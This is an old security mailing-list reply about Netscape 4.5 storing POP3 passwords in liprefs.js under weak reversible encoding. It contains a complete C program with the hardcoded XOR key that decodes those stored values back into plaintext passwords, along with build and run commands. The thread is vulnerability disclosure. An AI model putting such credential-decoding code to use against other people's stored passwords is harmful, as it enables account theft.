Re: Netscape 4.5 vulnerability

[wojtekka () BYDNET COM PL (Wojtek Kaniewski)]

Alexey Pavlov wrote:
> I found method how to get users passwords from Netscape 4.5 for
> FreeBSD ~user/.netscape/liprefs.js file. This file is used for
> storing user last session preferences .This file also contains
> encrypted password for pop3.

This method has been found months ago.

> Not like a DES , this encryption can be decrypted. As a result of
> many experiments i wrote this program. It gives me almost all
> passwords in my system, because all people use Netscape.
> Here is src of this decryption programm:
> (snip)

Fascinating way to decrypt "xored" password :) Here's my little
decoder, that I wrote in April 1998 for Netscape 4.0x.

-----cut here-----
/* (c) 1998 by wojtek kaniewski (wojtekka () dione ids pl) */

#include <stdio.h>

char base64[] = \
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

char key[] = \
  { 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139,
    76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67,
    93, 1, 10 };

void main(int argc, char **argv) {
  int d = 0, m = 7, b, i = 0, c;
  char *p = (argc > 1) ? argv[1] : "";
  for (; *p && *p != '='; p++) {
    for (c = 0; c < 64 && *p != base64[c]; c++);
    for (b = 5; b > -1; b--, m--) {
      d |= ((c & (1 << b)) >> b) << m;
      if (!m) {
        printf("%c", d ^ key[i++]);
        d = 0;
        m = 8;
      };
    }
  }
  printf("\n");
}
-----cut here-----

$ gcc decode.c -o decode
$ ./decode <encrypted-password-here>

And no, it _won't_ get encrypted password from preferences file for you.

--
wojtekka () irc pl:: http://wojtekka.stone.pl/ :: ^wojtekka@irc